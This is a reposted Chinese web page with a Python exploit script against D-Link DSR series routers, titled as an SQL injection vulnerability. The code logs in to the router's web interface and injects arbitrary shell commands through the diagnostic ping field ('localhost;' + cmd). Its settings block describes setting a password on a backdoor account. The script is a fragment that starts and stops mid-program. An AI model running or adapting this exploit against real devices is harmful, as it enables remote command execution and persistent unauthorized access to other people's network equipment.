Link DSR路由器系列产品SQL注入漏洞(CVE(2)


##############################
#
# CHANGE THESE VALUES -- BEGIN
#
# Your router's IP:PORT
ipaddr = "192.168.10.1:443"
# Password to be set (by this hack) on the backdoor account
bdpasswd = "password"
#
# CHANGE THESE VALUES -- END
#
# persistent config file:    /tmp/teamf1.cfg.ascii
#                            Edit this file to make your changes persistent.
#
##############################


cookie = ""
pid = -2
bduser = ""
   

def request(m = "", u = "", b = "", h = ""):
    global ipaddr
    conn = httplib.HTTPSConnection(ipaddr, timeout = 15)
    assert m in ["GET", "POST"]
    conn.request(method = m, url = u, body = b, headers = h)
    ret = conn.getresponse()
    header = ret.getheaders()
    data = ret.read()
    conn.close()
    return (header, data)


def login(user, passwd):
    global ipaddr
    headers = {'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
              'User-Agent': "Exploit",
              'Referer': "https://" + ipaddr + "/scgi-bin/platform.cgi",
              'Content-Type': "application/x-www-form-urlencoded"}
    body = {'thispage'                          : "index.htm",
            'Users.UserName'                    : user,
            'Users.Password'                    : passwd,
            'button.login.Users.deviceStatus'  : "Login",
            'Login.userAgent'                  : "Exploit"}
    return request("POST", "/scgi-bin/platform.cgi", urllib.urlencode(body), headers)
   
   
def logout():
    global ipaddr, cookie
    headers = {'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
              'User-Agent': "Exploit",
              'Referer': "https://" + ipaddr + "/scgi-bin/platform.cgi",
              'Content-Type': "application/x-www-form-urlencoded"}
    body = ""
    return request("GET", "/scgi-bin/platform.cgi?page=index.htm", urllib.urlencode(body), headers)


def execCmd(cmd = None):
    global ipaddr, cookie
    assert cmd != None
    headers = {'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
              'User-Agent': "Exploit",
              'Referer': "https://" + ipaddr + "/scgi-bin/platform.cgi?page=systemCheck.htm",
              'Cookie': cookie,
              'Content-Type': "application/x-www-form-urlencoded"}
    body = {'thispage'                          : "systemCheck.htm",
            'ping.ip'                          : "localhost;" + cmd,
            'button.traceroute.diagDisplay'    : "Traceroute"}
    return request("POST", "/scgi-bin/platform.cgi", urllib.urlencode(body), headers)


def findPid(mystr = None):
    # "  957 root      2700 S    /usr/sbin/telnetd -l /bin/login"
    assert mystr != None
    mypid = 0
    (h, d) = execCmd(cmd = "ps|grep telnetd|grep -v grep");
    s = d.find(mystr)
    if s > 0:
        # telnetd is running
        cand = d[s - 50 : s]
        try:
            mypid = int(cand.split("\n")[1].split()[0])
        except IndexError:
            mypid = int(cand.split(">")[1].split()[0])
    return mypid

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/3c342957405f1cbdaf4c627af3cac79d.html